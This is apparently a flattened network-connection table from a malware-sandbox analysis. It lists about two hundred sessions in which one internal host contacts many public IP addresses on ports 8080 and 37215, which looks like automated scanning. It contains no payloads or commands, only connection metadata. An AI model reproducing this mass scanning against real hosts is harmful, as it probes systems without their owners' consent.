                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30637192.168.2.2338972136.165.226.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30638192.168.2.234117843.249.212.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30639192.168.2.2345704217.197.84.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30640192.168.2.233324285.214.225.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30641192.168.2.234529446.119.189.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30642192.168.2.2344302208.157.252.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30643192.168.2.2360032205.0.161.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30644192.168.2.2344780137.79.88.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30645192.168.2.234812014.73.76.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30646192.168.2.2340282108.195.49.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30647192.168.2.2350492178.255.85.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30648192.168.2.233331280.49.61.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30649192.168.2.2357676204.196.119.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30650192.168.2.2347240190.12.134.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30651192.168.2.235922446.53.165.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30652192.168.2.2348486223.113.55.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30653192.168.2.2333478149.2.69.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30654192.168.2.235683420.86.51.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30655192.168.2.234254640.130.194.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30656192.168.2.2359298129.69.60.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30657192.168.2.234431224.89.84.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30658192.168.2.235838264.106.101.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30659192.168.2.23446604.132.121.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30660192.168.2.2355988179.6.206.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30661192.168.2.235918224.67.108.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30662192.168.2.234118261.100.158.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30663192.168.2.2359340101.162.117.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30664192.168.2.23443022.98.83.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30665192.168.2.235099251.64.134.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30666192.168.2.2332944194.241.167.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30667192.168.2.236091827.56.53.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30668192.168.2.2340264114.107.172.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30669192.168.2.2351280195.97.214.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30670192.168.2.234047064.50.91.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30671192.168.2.2352324178.132.129.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30672192.168.2.2343028210.94.28.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30673192.168.2.2343402131.210.246.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30674192.168.2.235917649.91.107.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30675192.168.2.2336490105.249.65.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30676192.168.2.235178235.190.220.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30677192.168.2.234666463.110.16.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30678192.168.2.2343802212.143.195.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30679192.168.2.234504657.25.211.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30680192.168.2.2348904219.44.238.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30681192.168.2.235246452.62.148.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30682192.168.2.2342220163.6.223.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30683192.168.2.2359410110.187.128.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30684192.168.2.2353618152.216.99.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30685192.168.2.2346848163.64.220.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30686192.168.2.233701631.3.235.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30687192.168.2.235632486.226.245.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30688192.168.2.235538853.223.132.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30689192.168.2.2340396170.194.54.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30690192.168.2.233762031.253.131.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30691192.168.2.233536442.201.186.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30692192.168.2.234289095.174.146.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30693192.168.2.23498182.96.102.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30694192.168.2.23511821.179.200.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30695192.168.2.2353596135.218.50.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30696192.168.2.234619623.167.83.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30697192.168.2.2356424115.192.198.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30698192.168.2.234174891.157.189.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30699192.168.2.2353814161.81.44.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30700192.168.2.2333430151.230.205.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30701192.168.2.234972464.23.121.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30702192.168.2.2351842189.221.9.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30703192.168.2.235731465.4.119.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30704192.168.2.2351626199.21.144.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30705192.168.2.23416908.18.161.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30706192.168.2.2335702159.129.4.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30707192.168.2.2353664157.232.5.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30708192.168.2.2338566203.61.52.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30709192.168.2.234317487.86.123.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30710192.168.2.234490435.187.98.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30711192.168.2.235218285.123.170.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30712192.168.2.2333010194.206.166.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30713192.168.2.2349684167.143.31.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30714192.168.2.2345474205.252.100.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30715192.168.2.234346613.22.232.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30716192.168.2.2335254135.33.114.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30717192.168.2.2348496218.8.71.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30718192.168.2.235921037.252.251.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30719192.168.2.2352824121.71.74.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30720192.168.2.2334698190.7.125.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30721192.168.2.2347486200.194.13.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30722192.168.2.2356584132.234.98.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30723192.168.2.235352442.38.28.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30724192.168.2.2350146179.19.115.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30725192.168.2.2350872176.70.145.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30726192.168.2.235618897.89.70.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30727192.168.2.2343690156.222.149.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30728192.168.2.233444041.240.206.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30729192.168.2.2356960169.246.255.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30730192.168.2.233744687.91.50.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30731192.168.2.23526969.102.121.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30732192.168.2.233505281.149.90.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30733192.168.2.2342314156.220.207.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30734192.168.2.234800892.32.135.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30735192.168.2.233646041.7.24.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30736192.168.2.2339424157.247.134.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30737192.168.2.2360046157.219.140.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30738192.168.2.2350278197.45.226.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30739192.168.2.2347724197.162.26.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30740192.168.2.2336156185.163.57.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30741192.168.2.234746841.127.57.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30742192.168.2.2334326157.93.202.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30743192.168.2.235661441.218.111.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30744192.168.2.2352196159.143.139.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30745192.168.2.234046466.108.129.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30746192.168.2.2346448220.63.71.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30747192.168.2.2358390118.37.246.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30748192.168.2.235808668.205.1.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30749192.168.2.2340860125.240.251.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30750192.168.2.2347758141.17.151.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30751192.168.2.2340036115.152.169.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30752192.168.2.235865873.250.210.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30753192.168.2.234276827.180.201.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30754192.168.2.233910841.49.253.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30755192.168.2.23414425.74.37.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30756192.168.2.234325699.77.93.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30757192.168.2.2334820132.234.178.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30758192.168.2.2359054175.95.247.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30759192.168.2.233817287.153.48.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30760192.168.2.235859412.248.69.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30761192.168.2.2360862182.32.231.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30762192.168.2.2341958130.224.82.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30763192.168.2.2340598107.196.84.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30764192.168.2.234905854.19.246.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30765192.168.2.2351588105.130.194.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30766192.168.2.2350688160.51.169.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30767192.168.2.2344928210.157.62.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30768192.168.2.2342278203.74.76.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30769192.168.2.2348064146.128.138.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30770192.168.2.2357838219.27.150.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30771192.168.2.235691650.103.196.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30772192.168.2.233448493.223.213.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30773192.168.2.235910092.244.22.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30774192.168.2.2340520197.116.16.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30775192.168.2.2349836202.219.157.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30776192.168.2.233411288.10.4.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30777192.168.2.2337278149.132.64.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30778192.168.2.2340716107.219.86.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30779192.168.2.2356518104.153.190.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30780192.168.2.234549834.17.106.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30781192.168.2.2350650149.216.19.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30782192.168.2.2353936218.64.69.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30783192.168.2.2335040102.84.234.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30784192.168.2.2334688217.212.4.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30785192.168.2.234655619.191.177.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30786192.168.2.233714864.125.74.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30787192.168.2.235389413.2.44.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30788192.168.2.234616887.253.120.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30789192.168.2.234525058.163.27.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30790192.168.2.2346594210.31.106.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30791192.168.2.2346490111.107.52.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30792192.168.2.2349552222.217.139.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30793192.168.2.2349096132.76.47.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30794192.168.2.234222061.232.175.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30795192.168.2.2339836185.70.175.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30796192.168.2.23453585.248.149.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30797192.168.2.234218280.205.34.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30798192.168.2.235108871.192.194.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30799192.168.2.236041697.42.223.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30800192.168.2.235037070.36.235.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30801192.168.2.2349898150.34.98.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30802192.168.2.235486020.163.70.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30803192.168.2.234913686.108.147.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30804192.168.2.234336412.133.208.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30805192.168.2.2333422111.159.193.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30806192.168.2.235217419.89.197.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30807192.168.2.234253281.20.120.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30808192.168.2.2350652190.135.195.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30809192.168.2.2343778206.4.97.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30810192.168.2.2340738103.240.87.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30811192.168.2.2346888135.171.227.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30812192.168.2.2336548151.208.135.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30813192.168.2.2348652168.69.78.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30814192.168.2.2351006150.241.135.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30815192.168.2.2336258210.210.115.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30816192.168.2.2343352126.113.187.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30817192.168.2.2359844105.248.235.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30818192.168.2.234674662.196.33.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30819192.168.2.2360004191.178.137.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30820192.168.2.235179083.219.61.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30821192.168.2.2347872103.20.253.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30822192.168.2.2335568102.53.78.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30823192.168.2.235293677.48.226.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30824192.168.2.23477401.163.128.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30825192.168.2.2353160140.78.245.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30826192.168.2.2335618184.101.155.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30827192.168.2.235261635.207.248.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30828192.168.2.2334804193.49.83.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30829192.168.2.235622640.201.24.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30830192.168.2.2345650190.32.111.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30831192.168.2.2350344164.0.106.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30832192.168.2.2351294108.176.133.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30833192.168.2.2358148111.202.27.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30834192.168.2.234721617.35.63.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30835192.168.2.2337616162.85.237.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30836192.168.2.235157235.250.185.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30837192.168.2.2352148151.143.73.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30838192.168.2.233441275.197.113.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30839192.168.2.2354874105.224.190.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30840192.168.2.2356578190.7.21.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30841192.168.2.234397288.35.170.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30842192.168.2.234220482.154.142.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30843192.168.2.2359940122.127.78.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30844192.168.2.2360634124.149.8.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30845192.168.2.233944460.102.131.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30846192.168.2.2344210217.153.76.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
